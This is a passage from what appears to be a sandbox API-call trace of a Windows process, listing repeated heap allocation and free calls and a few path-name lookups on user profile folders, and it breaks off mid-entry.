(HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0191.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0191.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0191.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0191.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0191.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0191.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0191.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0191.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af38e8 [0191.588] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Searches\\") returned="Searches\\" [0191.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0191.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af38e8 | out: hHeap=0x2c0000) returned 1 [0191.588] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0191.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.588] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0191.589] HeapFree (in: hHeap=0x2c0000, 